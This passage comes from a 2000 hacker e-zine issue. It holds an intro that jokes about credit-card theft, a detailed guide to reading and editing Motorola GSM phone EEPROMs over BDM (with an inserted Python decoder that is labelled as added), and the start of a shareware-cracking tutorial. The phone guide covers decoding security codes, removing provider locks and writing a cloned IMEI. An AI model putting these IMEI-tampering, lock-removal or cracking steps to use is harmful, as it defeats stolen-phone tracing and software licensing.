Warning: This text file is to be used for educational purposes only!
        If you find any Anti-BTC, H/C/P/A/W materials to be offensive
                    STOP reading this text file right NOW!
       Phreedom shall not be liable for any direct or indirect damages
          caused by the use / misuse of the information below!
     This .txt file should be distributed unmodified and free of charge
      Reproduction of any part of the materials below should be done
            with the strict permission of the respective author







 .   . . ... www.phreedom.org .  ...
                .. . . phreedom.orbitel.bg    ...   .   .   . . . . .......
                                                     t e c h n i c a l
                                                .   m a t e r i a l s
                .                               |      [ h / c / p / a ]
                |                               |
         /---\  \---\  /---.  /--.   /--.   .---/  .---\  .---\
         |___/  '   |  |      |__/   |__/   |   .  |   |  | | |
         |          '  '      \---   \---   \---'  \---'  \   '
         |
         '          . .. ... [ m a g a z i n e ] : since 1 9 9 7
 . . ...
  i  s . s  u e
       .   0 0 0 1 0 1 1 0
       ..... . . . .   .   .  .  . . . .... . . .  .   .   . 10 . 03 . 2000



                                          .
                                    T O C .
   .      .      .     .    .  ... .  .   .
          a r t i c le                    .             a u t h o r
                                          .     .   .   . ...  .  .    .
          Intro                                       Solar Eclipse
          Background Debug Mode for Motorola GSMs             Kuche
          Cracking PC CLub 1.0                              DaFixer
          A Pledge to Comrade ManiaX                 Phreedom Staff
          Detecting InterNet Connections           ManiaX Killerian
          Cracking Java Applets                       Solar Eclipse
          Cracking MMTools                                  DaFixer
          Wireless/Packet Modems                                ADA
          Cracking WinHack2                                 DaFixer
          Cracking PerlBuilder 1.0                         mr-drone
          Interview with a BG carder                            EXo
          Stealing 100000 Credit Cards in 21 Days     Solar Eclipse
          Microsoft Wordpad Buffer Overflow Research  Solar Eclipse
          . .. first I flood the provider, then I wipe it Anonymous



                                                                   .
                                                                   .
                              staff@phreedom.org
                     .     .  . .. .... .. .. . . ..    . .    .   .      .

                   [     ManiaX      ]              founder        .
         .         [       EXo       ]      editor in chief        .
                   [  Solar Eclipse  ]     assistant editor
         .         [ General Failure ]    foreign relations        .
         .         [    IronCode     ]   typographical fixer
                   [       kay       ]             maillist
  .      .    .   .  . .. . . .. .. .... .. .  .     .
         .
                       feel free to get in touch any time
         .


. . . . . . . . . .. . ... . ............... Intro By Solar Eclipse ........... . . . . . . . . . . . . . .

This is issue 22 of Phreedom Magazine. This issue reaches you thanks to the dots (ASCII 0x2e), of which Solar Eclipse is obviously a big fan. I hope you like them too, at least a little. Why are dots so nice? Well, because they are round... and all round things are nice. If you don't believe me, lock yourself in a room and take some dots along. No food, computers or television, just dots. Don't come out for a few days and you'll see how much you start to like them. You simply won't be able to live without dots anymore. I speak from personal experience, as you have probably guessed :-)

OK, enough of this nonsense. Opening the new issue, you are probably trembling in anticipation of finding out what's in it. Your finger is on the PgDn key, ready to press it and hold it while your reddened eyes impatiently swallow 150 KB of high-quality technical information. In one breath. I know it isn't easy to hold back, so I won't bore you with this Intro for too long. I'll get to the point.

As you probably know, this issue came out exactly on time (however unbelievable that sounds). The public position of the Phreedom Staff is that we will not apologize to anyone for what happened in 1999, but we will nevertheless do our best to make sure it doesn't repeat in the future. The goal is to put out an issue every 2-3 months. That gives us about 4-6 issues a year, which sounds pretty good. Of course, as always, the success of Phreedom Magazine depends solely on YOU. On your willingness to share your knowledge and exchange experience. Not only on our inspiration and effort, but on yours too. Let me quote part of the Phreedom Credo:

   V. Who should read Phreedom:
   . People who want to learn something new;
   . People who can teach us something new (not only us, but anyone who decides to read Phreedom);
   . People who don't think that having a brain in your head and using it for its intended purpose is improper;
   . People who don't belong to the group of total lamers, who never dare to take on anything;

Don't be part of the last group! The saddest thing is that lately you meet more and more people who call themselves 'lamers' and are even proud of it... "I'm a lamer, but so what: everyone has been a lamer." This is one of the most miserable things a person can say. It is resignation to one's own stupidity, resignation to laziness and misery. It is falling into a hole from which there is no way out... It's true that even the best started somewhere, but they never called themselves lamers. If you are a real hacker, if the meaning of your life is to learn and to move forward regardless of the obstacles, you would never call yourself a lamer. That is his (or her) worst nightmare. Even the thought that somebody might take you for a lamer will make the real hacker dig even deeper into the books and the source. So that after a while he can raise his eyes, look proudly at the world around him and say:

   The world of the electron and the switch. This is my world. I created it and I have the power to destroy it. I can also make it better. I am a HACKER.

Think about that.

Enough with the lyrical digressions, let's get back to the topic. And what was the topic, you ask? The topic was Phreedom Magazine Issue 22. I don't claim it is the best issue ever published, but I think that for an issue put together in 2 months it is quite decent. (EXo: And for the first issue prepared by Solar Eclipse, simply wonderful...) What will you find in it? A large part of the articles deal with cracking. This is a relatively new topic for Phreedom and I'm glad that there are already several new authors working in this interesting area. Greetings to mr-drone and DaFixer for a job well done. We also offer one more article dealing with something (for me personally) completely new: Java cracking. We also have two technical articles on wireless communications, GSM and packet radio in particular. ManiaX will once again entertain us with his favorite topic: an explanation of what the Internet is, whether it has any ground here, and if so, how to detect it. In recognition of his inexhaustible wisdom and mighty support, the Phreedom Staff has prepared "A Pledge to Comrade ManiaX Killerian". The five-year plan in four years, Stakhanov style, if you know what I mean. Those born after 1989 probably won't get what this is about. (EXo: do we have such readers? If so, speak up, I'm buying each of them a BlackDog :))))

For those of you wondering how to make money for the seaside this summer, Solar Eclipse has prepared his monumental work "Stealing 100000 Credit Cards in 21 Days". I hope you like it, and don't take it too seriously, so nobody gets hurt. For the more technically oriented readers there is also an article devoted to the process of researching a buffer overflow in a Windows environment and its results. Finally we close with an IRC log, which some would classify as fun, but which personally made me want to cry when I read it. I think it is one of the most miserable and low things a person can do. Read it and give your opinion. If you still don't know how, visit Phreedom's public Message Board at http://phreedom.orbitel.bg/mboard/ or http://mboard.phreedom.org/ Of course, before you reach the board you'll have to pass through the lamer filter, which unfortunately stopped far more people than we expected. (EXo: no... you won't have to do anything other than think with your own head and be a bit more observant.) Since this issue turns out to be more or less cracking related, I'm glad that it will also contain 1-2 off-topic materials for fans of the other spheres of technical knowledge. I'm not sure whether the theory of carding qualifies as technical knowledge, but the interview with a fairly advanced BG carder will certainly be interesting to many wannabes.

Besides the overview of the issue, the Phreedom Intro often also looks at interesting events that happened while the readers anxiously waited for the new issue. This time too we won't break the tradition. The past 2 months were a fairly eventful period. The most anticipated (and least deserving of the anticipation) event was the beast called Y2K. Many expected the end of the world, an alien invasion, or something minor, like every computer on earth crashing hard and causing "The End Of The World As We Know It". Fortunately (or unfortunately), nothing of the sort happened. Even the fears of widespread hacker attacks on New Year's Eve did not come true. For me personally it was one of the most boring New Year's nights, just as it was for the thousands of system administrators waiting to see their worst nightmares come true. (EXo: for me it was an incredible New Year: I fell out with everyone close to me, told them all where to go and spent almost (...) alone on the streets of Sofia and later in club Chervilo. I can't describe exactly what freedom I felt then.)

For everyone who doesn't know: Kevin Mitnick is free. You can now stop writing "Free Kevin" on defaced websites and use "free" as an adjective: "Kevin Free". Joking aside, Kevin's problems in life are only just beginning. 30 years old, 5 years spent hiding from the law and another 5 in its clutches. Turned into an icon for a generation of hackers. Under a court order forbidding him to use a computer, a touch-tone phone, or any access to the Internet. No human being deserves that. The problem is that people still don't understand that access to technology and to the Internet is not a privilege but a basic human right, as primal as the right to breathe and to read. Nobody would think of forbidding a former prisoner to read. But Kevin Mitnick is forbidden to use the Internet, humanity's greatest treasury of information. I doubt any of you will do it, but on Kevin's website (www.kevinmitnick.com) there is an address where you can send donations to help Mitnick rebuild his life. Regardless of how guilty he is, the government of the United States of America has screwed him 100 times over, as a lesson to the rest. Jesus also died for our sins... or so they say.

The last event I want to draw your attention to is the DDoS attack that successfully took down Yahoo, eBay, ZDNET and a few other big sites. Although the public reaction was huge, this is nothing new and few security experts were surprised. Some of them even rubbed their hands with glee: the more people fear hackers, the more work (and money) there will be for security consultants. Even the guys from L0pht were practically showered with money by @Stake. I hope it doesn't stop them from continuing their exceptionally elite work.

That's it. Read the magazine and enjoy it. It's yours. Be smart! And keep off the grass...

Solar Eclipse (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ............... Background Debug Mode for Motorola GSMs By Kuche ........... . . . . . . . . . . . . . .

   I.    What this article is about (intro)
   II.   BDM in detail
   III.  The toy's EEPROM
         1. Changing the melody
         2. Startup text
         3. Test card
         4. Unlocking with BDM
         5. Menus
         6. Others
         7. CRCs
   III.  Peripherals
         1. LCD
         2. Keyboard
   IV.   Undiscovered possibilities
   V.    Discovered impossibilities
   VI.   Links
   VII.  Abbreviations
   VIII. Conclusion

I. What this article is about (intro)
A few months ago my uncle turned up at our place with a few GSMs, Motorola d160s, and a proposal to unlock them. That's when my sick pumpkin got talked into this dirty business. After nothing came of the tricks offered on the Internet, I plucked up the courage to try BDM. Great was my surprise when the little circuit worked first time. But once I understood what BDM can do, I decided not to stop there (besides, all the MEs had the same IMEI).

The article will mostly talk about the EEPROM and the data stored in it. An advantage of BDM is that you can read all the available memory without desoldering it (the DSP's is mask programmable). The article was written during practice with about ten d160s (so what is written applies mostly to the d160, but the difference from other models is quite small as far as the EEPROM data goes; the firmware is completely different), with different firmware versions (3), and locked to different providers. This is also the place, I think (is it?), to mention that 60% of the info is on the Janus pages [ 2 ], but what can I do when everything about Motorola is there (albeit scattered). There is no longer any firmware for download there, though.

BDM is short for Background Debug Mode (you can translate it yourselves), which is used for setup, testing and flashing of some Motorola MCUs, for example the 68HC16 (CPU16), 683xx (CPU32) and others. It exists in 2 variants, 16-bit for CPU16 and 32-bit for CPU32, the difference being mentioned in [II]. Of interest (for the article) is the MC68338(2), which is used in quite a few of Motorola's GSM models (even though they may be a bit old). Such are the d160, d170, cd520, **00, StarTAC, cd9*0 and others, as well as some GSMs from other manufacturers. Two JPGs come with the article, in which the schematic of the hardware is described (scribbled) (it isn't scary: 2 ICs, 2 capacitors and 2 resistors), plus a PCB of my own making. The software, buggy as it is, is the only freeware, and you can write your own. The source is at [ 1 ]. BDMFLASH is clunkier than BD32, but in return it lacks the bugs characteristic of BD32. Best to have both [ 4 ], [ 3 ]. A problem is the copyright of the firmware (and of windoz, but that's another topic): even though we (you) have no right to disassemble it, I recommend IDA (full version, it supports Motorola CPUs), as well as 68kasm, an assembler for the 68k. (Lately IDA let me down, so don't rely on it too much.)

There is one awkward moment in the whole story: you can wreck everything if you're not careful what you're doing (I did, but luckily I had enough identical GSMs), so above all dump the EEPROM and the FLASH first. This can go into 2 files or into one, but it's better to have the EEPROM as a separate dump (it is the goal of the exercise). If the firmware looks old to you, you can update it (mine had 85.00.27, which got updated to 85.00.56). Naturally that's the same as installing pirated windoz. The FLASH is 1 MB and the EEPROM 8 KB, starting at $120000 (from here on $ denotes hex numbers, not only because I'm too lazy to write 0x, but also because that's how BD32 writes hex). The dump can be made either with BDMFLASH or with the several macros for BD32 [ 5 ], which unzip into its directory. The article mostly describes ways of changing the settings (some of which can be changed with a clone card, which I never got working). Another peculiarity worth mentioning is that the track the interface is soldered to may lift from overheating, which is slightly unpleasant (very, actually!). As an intro I think I've said everything important (not forgetting that one of the pins (WDOG) must be tied to +5V; the power comes from the PS/2 port or from the ME itself, L275). At [ 6 ] you can find the layout of the pads in the ME.

II. BDM in detail

Hardly anyone is interested in this, but it's still not bad to have it. The full description is at [ 7 ]; here it's naturally much shorter. The MCU pins that have anything to do with BDM are: FREEZE, /RESET, /IPIPE (DSO), /IFETCH (/DSI), /BKPT (DSCLK). On the CPU16, /IFETCH = IPIPE1, /IPIPE = IPIPE0 and /DSI = DSI; the difference between the latter is only the inversion in the indicated places (/). FREEZE is an output pin that shows whether the CPU is in BDM (high). When FREEZE is 0, IPIPE and IFETCH are used to trace the instructions the CPU is processing. That capability is not included in this variant of the interface. BKPT is an input pin, used to request BDM, which takes effect on the next instruction. When the CPU is in BDM (FREEZE high), IPIPE becomes the serial output (DSO), IFETCH the serial input (DSI) and BKPT the clock (DSCLK). Over the serial link obtained this way the CPU receives commands on the serial input (IFETCH/DSI), processes them and returns the result on the serial output (IPIPE/DSO), in 17-bit words. The most significant bit is a status bit: 1 marks an error or not-ready response rather than data, 0 marks valid data. The instructions that can be sent over BDM are comparatively few; a full list is in the source mentioned above. RESET is used together with BKPT. The attached schematic is fairly simple and easy to build, but doesn't offer the full capabilities of BDM. Somewhere on the net I saw the full variant for sale at the modest price of a few hundred $.

In the ME itself there is one CPU (no kidding!), flash memory with the firmware, EEPROM with configuration data, a SIM reader, a modem (having something to do with the TRx), an LCD with controller, and the kbd. Half of these have their own addresses in memory (something like $2f8 on the PC (lame)); the other half is wired directly to the CPU ports. Below there are separate sections on the EEPROM, FLASH, KBD and LCD.

III. The toy's EEPROM

It can be anything; in most phones it's an Atmel (including the d160). Below are some possibilities, numbered. They are the more interesting ones (at least according to me).
The others are stuffed together under number 6.

1. Changing the melody

One of the melodies (the only one that can be changed) is stored at address $861. The configuration is at address $884: bits 15:10 are the length (in notes), 9:8 the tempo, 7:1 don't care, and bit 0 must be 1. At addresses $861-$883 the notes of the melody are written as follows: bits 7:5 duration, 4:0 note, where 00 is a rest and $1f is the highest C (or whatever musicians call it). The duration is: 00 - 1/16; $20 - 1/8; $40 - 1/4; $60 - 1/2; $80 - 1; $a0 - 2; $c0 - 4; $e0 - 8 (I'm bad at solfeggio and don't know of double and longer notes, but there they are). If you use a test card (or $13 at address $3B) with command 1542# you can hear your composition. An example of such a melody I found at [ 8 ]:

   Addr: $861 862 863 864 865 866 867 868 869 86a 86b 86c 86d 86e
   Val : $ 03  0B  0C  0A  0B  01  0C  02  17  02  02  02  02  02

2. Startup text

It is stored at address $33F in the EEPROM, usually MOTOROLA <0A> GSM, where <0A> = <Enter>. You can cram in up to 24<0A>24 characters of text, which appears every time the phone is switched on.

3. Test card

This toy costs $50-200 in the shops (if you can find it). Naturally with BDM it can not only be emulated (if you know the address; I don't (IDA)), but setting bit 4 at address $3B gives you the ability to enter Test mode by holding the [#] button, without BDM or a test card. A full description of the commands is at the corresponding link [ 1 ]. It may be mentioned here that some of the commands are empty and convenient for hooking in your own code (you put a jmp at the corresponding address, where a jmp to an empty sub sits). I read somewhere that a whole series of phones shipped with this bit set, which turned into something like the NightCam incident with Sony.

4. Unlocking with BDM

(This is *only* for psychopaths or hardcore fans.) Despite the mental torment of downloading 15 MB of IDA (thanks to Solar Eclipse), the firmware turned out to be a big bitch (as mentioned below). Disassembling it was impossible (at least for IDA :(((( ), but anyway, it's hardly worth that much effort just for unlocking. If you really need it, here's the only code I know: $052: 4A7462020000000064; $3AB: 00; $3B0: C42B. The first is the phone's encoded IMEI [ 9 ], the second is the address of the SP Lock (03 is enabled / 00 disabled), and lastly the ugly CRC, which I never found where it's calculated (that's done with a clone card emulator, which I never got going [10 ]). If the trick works for someone, they can try different IMEIs. Most likely the SP guys will notice many phones with one and the same IMEI and decide to do something silly. This IMEI is correct *only* for phones with version 0010109 of the EEPROM map. That can be checked with a little program [ 11 ], which also shows plenty of info pulled from an EEPROM dump, and which is absolutely necessary.

5. Menus

In the phones some menus are disabled, so as not to cause the owners mental torment, and when needed to suck their money out. A map of the menus is at [ 12 ]; the values are grouped by 8 and written at addresses $A0... Among them there are quite a few tricks for which they could even chase you like dogs.

6. Various others

'Hmmmm,' you'll say, 'we got to the "various" awfully quickly.' Well, that's how it is, what can you do. Here are the addresses in the format ADDR, LEN, INFO:

   $36F, 3, Security code, 6 digits: 123123 = 21 13 32
   $372, 2, Unlock code, 4 digits, encoded like the security code
   $5B0-$5CC, every 4 bytes, encoded SP code; according to some it is XORed with F6F6F6F6 and swapped in the above manner
   $FBC, to the end, the phonebook
   $0, 2, Checksum of parts of the EEPROM. They are fixed the way indicated at the link (the test-card one). There is a copy of the sum at $910.

All the string data can be seen and changed with MotTool [11 ].

7. CRCs

Finally, the nastiest thing: the CRCs floating around the EEPROM. This is the CRC of IMEI+SP, with an unknown polynomial (IDA). Some newer models also have a damned little chip, the DS2401, which fucks up (mmmmmm, profanity) modifying the EEPROM. Info on it is at [ 13 ]. It is also CRC-based. At the same link there is also a line scribbled about a DS2401 emulator on a PIC 12C509 (those PICs sure get used for illegal stuff.....).

III. Peripherals

Of the peripherals I found info only for the LCD and the KBD, in a file (d160HW.zip) whose link I'm not sure I could find again, because at that time these things were terra incognita to me. And IDA played a dirty trick on me by failing to disassemble the firmware; more about that misery below.

1. LCD

On the back of the LCD there is an encapsulated chip (Hitachi 44780), and to use it the corresponding registers must be written in RAM. The LCD uses 2 addresses: one for control, $ffa001, and one for data, $ffa000. These are the registers that must be set before using the above (this would never have crossed my pumpkin if I hadn't seen the file mentioned):

   $fff400 -> $0C
   $fff488 -> $12f7
   $fffa58 -> $ffa03230

Values that are wider continue into the following addresses. The characters are written to the data address sequentially, one nibble at a time (e.g. code $65 is written as $ffa000 -> 6; $ffa000 -> 5). The codes themselves are ASCII: $41 - A; $42 - B; ....., $61 - a; $62 - b....., special symbols below $40. At the control address, in the same way, info is written about the icons (1/0), the write position, clearing the screen, etc. Unfortunately this info isn't well developed yet, because I found the file literally 2 days ago and haven't worked with it (but that doesn't stop you trying; here at least nothing is scary). A link with LOTS of info about the LCD: [16]. It even has info on how to make your own characters (codes 0 to 7).

2. Keyboard (or whatever it's called....)

In the file described above I also found a little info about the kbd matrix. It uses Port E and Port F of the MCU for the matrix. PortE: $fffa17 - Pin Assignment (0); $fffa15 - I/O, 1 for input, 0 for output; data addresses $fffa13 and $fffa11. PortF: $fffa1f - Pin Assignment (0); $fffa1d - I/O, same as PortE; $fffa19 and $fffa1b are the data addresses. Reading is done by driving a 1 on PortE[7:3] one line at a time and looking at the result on PortE[2:0] and PortF[4:3]. The matrix is as follows:

          E7     E6    E5    E4    E3
   E0    [vlm]  [OK]  [<-]  [8]   [1]
   E1    [->]   [C]   [7]   [6]
   E2    [#]    [5]
   F3    [^]    [0]   [4]   [3]
   F4    [M]    [*]   [*]   [9]   [2]

The info on the LCD and KBD is quite useful if you sit down to turn the GSM into something else, or at least to mess with the firmware. Not to brag, but that's what I'm trying to do. Here is the moment to mention that I have nothing against Motorola (apart from the mangy mutt in front of their office, which wanted to eat me and ADA), so if they have anything against my disassembling (for 'educational purposes'), let them send me some books (to learn from them and not from the firmware, because there's fuck all in the shops ;-PP). Until then, boldly forward.

The firmware, as I mentioned above, is in an 8 Mbit (1 MB) flash ROM, usually by AMD or Intel; here and there others are seen. Via BDM it is addressed from $0 to $FFFFF, and the EEPROM from $120000 to $121FFF. Unfortunately IDA couldn't disassemble the code (not all of it), which tied my hands. So instead of code for all sorts of silliness I'll have to put in only some more basic things.

IV. Undiscovered possibilities

With the help of a 68k assembler [ 14 ] you can write your own program, assemble it and shove it in place of the firmware, with the start address in the .bin file needing to be $400. That way you can turn the GS M even into a bomb (it has everything, even an RTC). The problem is the info, which *cannot* be found anywhere apart from [ 15 ] :(.
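Going back to the EEPROM layout from section III: the fields with a documented encoding (melody at $861/$884, startup text at $33F, the test-mode bit at $3B, the security and unlock codes at $36F/$372, the SP lock byte at $3AB and the raw IMEI at $052) can be pulled out of a dump and put back with a few dozen lines of Python. The following is an added example written for this article; it is not code from the original, nor from MotTool, BD32 or BDMFLASH. Offsets and bit layouts are the ones given above; the field names, the big-endian byte order assumed for the 16-bit config word at $884 (native for the 68k), the NUL termination assumed for the startup text, and the sample dump itself are this example's own assumptions. The checksums at $0/$910 and the CRC at $3B0 are deliberately not computed, since the article does not give their algorithms, so a modified dump still needs them fixed the way the article describes before it goes back into the phone.

```python
"""Decoder/encoder for the Motorola d160 EEPROM fields described in section III.

Added example for this article, not code from the original page or from any of
the tools it links. Field offsets and encodings are the ones the article gives;
the field names, the byte order of the 16-bit melody config word (assumed
big-endian, as the 68k is), the NUL termination of the startup text, and the
sample dump are this example's own assumptions. Offsets are EEPROM-relative:
BDM address = EEPROM_BASE + offset.
"""
import struct
import sys

EEPROM_BASE = 0x120000         # EEPROM occupies $120000-$121FFF in BDM space
EEPROM_SIZE = 0x2000

IMEI_OFF = 0x052               # 9 bytes, encoded IMEI (see [9])
TEST_FLAGS_OFF = 0x03B         # bit 4 set: hold [#] at power-on to enter Test mode
STARTUP_TEXT_OFF = 0x33F       # up to 24 chars, <0A>, 24 chars
SECURITY_CODE_OFF = 0x36F      # 6 digits in 3 bytes, one digit per nibble
UNLOCK_CODE_OFF = 0x372        # 4 digits in 2 bytes, same encoding
SP_LOCK_OFF = 0x3AB            # $03 = SP lock enabled, $00 = disabled
MELODY_OFF = 0x861             # note bytes $861..$883
MELODY_CFG_OFF = 0x884         # 16-bit config word
MELODY_MAX_NOTES = MELODY_CFG_OFF - MELODY_OFF   # 35 note slots

# Duration sits in bits 7:5 of each note byte; index = byte >> 5.
DURATIONS = ["1/16", "1/8", "1/4", "1/2", "1", "2", "4", "8"]


def decode_digits(raw: bytes) -> str:
    """Codes are stored one digit per nibble, low nibble first: 123123 -> 21 13 32."""
    return "".join(f"{b & 0x0F}{b >> 4}" for b in raw)


def encode_digits(code: str) -> bytes:
    if not code.isdigit() or len(code) % 2:
        raise ValueError("code must be an even number of decimal digits")
    return bytes(int(code[i]) | (int(code[i + 1]) << 4)
                 for i in range(0, len(code), 2))


def decode_melody(dump: bytes):
    """Return (tempo, [(duration, note), ...]) from the $861/$884 area."""
    cfg = struct.unpack_from(">H", dump, MELODY_CFG_OFF)[0]   # big-endian assumed
    if not cfg & 1:
        raise ValueError("melody config bit 0 must be 1")
    length = (cfg >> 10) & 0x3F
    tempo = (cfg >> 8) & 0x03
    notes = []
    for b in dump[MELODY_OFF:MELODY_OFF + min(length, MELODY_MAX_NOTES)]:
        notes.append((DURATIONS[b >> 5], b & 0x1F))   # note 0 = rest, $1F = top
    return tempo, notes


def encode_melody(notes, tempo: int):
    """Inverse of decode_melody: returns (note bytes, config word)."""
    if len(notes) > MELODY_MAX_NOTES:
        raise ValueError(f"at most {MELODY_MAX_NOTES} notes fit before $884")
    body = bytes((DURATIONS.index(d) << 5) | (n & 0x1F) for d, n in notes)
    cfg = (len(notes) << 10) | ((tempo & 3) << 8) | 1
    return body, cfg


def decode_eeprom(dump: bytes) -> dict:
    if len(dump) != EEPROM_SIZE:
        raise ValueError(f"expected a {EEPROM_SIZE:#x}-byte EEPROM-only dump")
    text = dump[STARTUP_TEXT_OFF:STARTUP_TEXT_OFF + 49].split(b"\0", 1)[0]
    return {
        "imei_raw": dump[IMEI_OFF:IMEI_OFF + 9].hex().upper(),
        "test_mode_on_hash": bool(dump[TEST_FLAGS_OFF] & 0x10),
        "startup_text": text.decode("ascii", "replace"),
        "security_code": decode_digits(dump[SECURITY_CODE_OFF:SECURITY_CODE_OFF + 3]),
        "unlock_code": decode_digits(dump[UNLOCK_CODE_OFF:UNLOCK_CODE_OFF + 2]),
        "sp_lock": dump[SP_LOCK_OFF] == 0x03,
        "melody": decode_melody(dump),
    }


# Melody from [8]: 14 notes, all 1/16 (duration bits 7:5 clear).
SAMPLE_MELODY = bytes([0x03, 0x0B, 0x0C, 0x0A, 0x0B, 0x01, 0x0C,
                       0x02, 0x17, 0x02, 0x02, 0x02, 0x02, 0x02])


def build_sample_dump() -> bytes:
    """Constructed dump (not read from a real phone) filled with the article's values."""
    d = bytearray(EEPROM_SIZE)
    d[IMEI_OFF:IMEI_OFF + 9] = bytes.fromhex("4A7462020000000064")
    d[TEST_FLAGS_OFF] = 0x13                       # bit 4 set, as in the melody test
    d[STARTUP_TEXT_OFF:STARTUP_TEXT_OFF + 12] = b"MOTOROLA\x0aGSM"
    d[SECURITY_CODE_OFF:SECURITY_CODE_OFF + 3] = encode_digits("123123")
    d[UNLOCK_CODE_OFF:UNLOCK_CODE_OFF + 2] = encode_digits("1234")
    d[SP_LOCK_OFF] = 0x03
    notes = [(DURATIONS[b >> 5], b & 0x1F) for b in SAMPLE_MELODY]
    body, cfg = encode_melody(notes, tempo=2)      # tempo value is made up
    d[MELODY_OFF:MELODY_OFF + len(body)] = body
    struct.pack_into(">H", d, MELODY_CFG_OFF, cfg)
    return bytes(d)


if __name__ == "__main__":
    dump = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    for key, value in decode_eeprom(dump).items():
        print(f"{key:18} {value}")
```

Run it with a dump file as the only argument to decode a real 8 KB EEPROM dump, or without arguments to decode the constructed sample. decode_eeprom() refuses anything that is not exactly $2000 bytes, which catches the combined FLASH+EEPROM dump the article advises against.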
That is also the idea I'm currently struggling with, and it may be published later as Anarchy (which has shrunk in volume lately). There are several convenient addresses that can be used to jump to a homemade routine placed in the free space in ROM. One such place is 22# of the test mode, as well as several more null_subs met in the bits of code IDA lifted. (Unfortunately I can't say exactly where they are, because they sit in functions nobody calls.)

V. Discovered impossibilities

It's quite hard to write code that reads data from the SIM card, because, as with using the LCD, a controller has to be used whose addresses and registers are unknown (IDA). The same goes for sending data to/from the TTx and TRx through its 'bottom hole', as well as sending/receiving on some channel. Naturally, with a bit more luck with IDA or some other disassembler (another problem with the LPT version of BDM: the software has trouble setting and using breakpoints) both of these points could turn into a wonderful performance.

VI. Links

As you'll notice, most links point to www.tele-servizi.com/janus. That's the coolest site for Motorola. Too bad they cut the firmware part of it (like BTK and Phreedom a while ago). It has collected almost all the necessary info and software. The other main server is Motorola's (naturally), where they change the links and the organization every other day.

   [ 1 ] : http://www.mot.com/pub/SPS/MCU/ibm/bdm-v090.zip
   [ 2 ] : http://www.tele-servizi.com/janus/
   [ 3 ] : http://www.mot.com/pub/SPS/MCU/mcu332/bd32-122.zip
   [ 4 ] : http://www.tele-servizi.com/janus/download/bdmflash.zip
   [ 5 ] : http://www.tele-servizi.com/janus/download/bd32Util.zip
   [ 6 ] : http://www.tele-servizi.com/janus/gsmbdm.htm
   [ 7 ] : http://www.mcu.motsps.com/lit/app_notes/an1230.pdf
   [ 8 ] : http://www.ut.ee/~mad/helin
   [ 9 ] : http://www.tele-servizi.com/janus/texts/imei.txt
   [10 ] : http://www.tele-servizi.com/janus/simemu.htm
   [11 ] : http://www.tele-servizi.com/janus/download/mottool.zip
   [12a] : http://www.tele-servizi.com/janus/medit.mnu
   [12b] : http://www.tele-servizi.com/janus/download/meditx11.zip
   [13 ] : http://www.dalsemi.com/DocControl/PDFs/2401.pdf
   [14 ] : http://welcome.to/68000
   [15 ] : http://www.mcu.motsps.com/
   [16 ] : http://www.myke.com/engres/lcd.htm

VII. Abbreviations

Some have probably asked themselves 'What are these words?'. Here are the few abbreviations used in the article.

   ME - Mobile Equipment. The phone.
   IMEI - International Mobile Equipment Identity. The phone's ID. Every phone has a unique IMEI, which was intended for tracing stolen phones.
   DSP - Digital Signal Processor
   BTK - Bjagajte ot Tezi Kozi ("Run from These Goats")
   SP - Service Provider. For BG currently only Mobiltel.
   SP Lock - Nasty moment. When the ME is SP locked, it can only be used with cards from a particular provider.

VIII. Conclusion

First, I want to say that I am extremely unhappy with the size of the article, and with its being in the style 'This is so; if you're interested, see link such-and-such', but what can you do: if I had set out to write everything, besides cluttering the article, you would have had to hold PgDn for quite a while before reaching the part that interests you (or the next article). Also, I very much regret that I couldn't write a bit of code to insert into the firmware. Curse me boldly (hat off to ToPPeR, for the Volts and Watts in the previous article, for example); only that way can I change (Man is a collection of his complexes). Another bad moment is that Solar Eclipse asked me to also include info about the GSM standard, which also didn't happen, because I think it's better to have a separate and fuller article on that. And the last thing I want to mention is a girl (something of a muse), who knows when I'll see her again, but I'm sending her looooots of @}--'--,-.

*This was finished at 2:55, but this time PM.

Kuche (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ............... Cracking PC CLub 1.0 (homegrown software for game clubs) By DaFixer ........... . . . . . . . . . . . . . .

I. Introduction

PCClub 1.0 is distributed together with 2 other shareware programs on the PC Mania disks. After installation it creates a directory with several exes:

   PCClubAdjust.exe   - a little program for adjusting the settings :)
   PCClubMonitor.exe
   PCClubRegister.exe - it's obvious what it is and what we'll do with it
   PCClubReport.exe
   PCClubScanner.exe
   PCClubShell.exe    - the main module; not a Windows shell, unlike the other programs on the disk, TimeShield and xTerminal

II. Required Utilities

   W32DASM
   SoftIce
   Your favorite hex editor (I use Hex Workshop)

III. Applying the Sting

Already during installation you notice that the "product" is written in Delphi (from the BDE installation). (Solar's note: installing BDE is no guarantee that the program is written in Delphi. The Borland Database Engine is supported by Delphi, C++ Builder and Borland C++. A better way to detect the compiler is to look inside the EXE and search for the identification strings that all compilers leave behind.) After the installation finishes and you try to start any of the exes for settings or reports, the "Access control" appears :)) Well, you're unlikely to guess the password, but there is one, and as far as I dug through the documentation it's never mentioned!
There was mention, however, of a password for access to PCClubShell.exe. I will spare you the digging and reveal that the password is "1" :). Now, about the "Access Control". Having seen that there is a password, I opened BDEAdministrator to look for an alias. Well, there was none. The programs probably set their aliases dynamically at run time. There was one peculiarity though: the BDE of PCClub 1.0 was installed in a different place from C:\Program Files\Shared Files\Borland Shared\BDE. Interesting... Clearly two instances of the same DLL cannot both be loaded in memory :) If you open BDEAdministrator and then start any of the PC Club programs... BOOM... Well, nothing special really, you just get to see what the main forms of the programs look like. Nothing more... "Unable to perform this operation on a closed data set" will appear if you try to make any changes. Later I found out that the passwords are not secret at all and are "2", "3" and "4". I have always hated reading boring help files :)). So much for the beginning.

After a little "staring" at the PE32 header of the files you notice the unpleasant:

   UPX 0.82 Copyright (C) 1996-1999 Laszlo Molnar & Markus Oberhumer
   $Id: NRV 0.61 Copyright (C) 1996-1999 Markus F.X.J. Oberhumer $
   $License: NRV for UPX is distributed under special license $
   UPX!

Bad! After you dig around the Internet and find out what UPX is:

   UPX : The Ultimate Packer for eXecutables
   Copyright (c) 1996-1999 Markus Oberhumer & Laszlo Molnar
   http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
   http://www.nexus.hu/upx

it becomes clear that we are dealing with yet another PE packer (a compressor, not an encryptor, but the effect on the disassembler is the same: the code is not in the file in plain form). By the way, the UPX description seemed to say something about it detecting SoftIce and doing unpleasant things to your PC if it finds it. So that is clearly not a solution. When you read a bit more about UPX you will see an interesting option, "d" - DECOMPRESS :)) He-He !!!
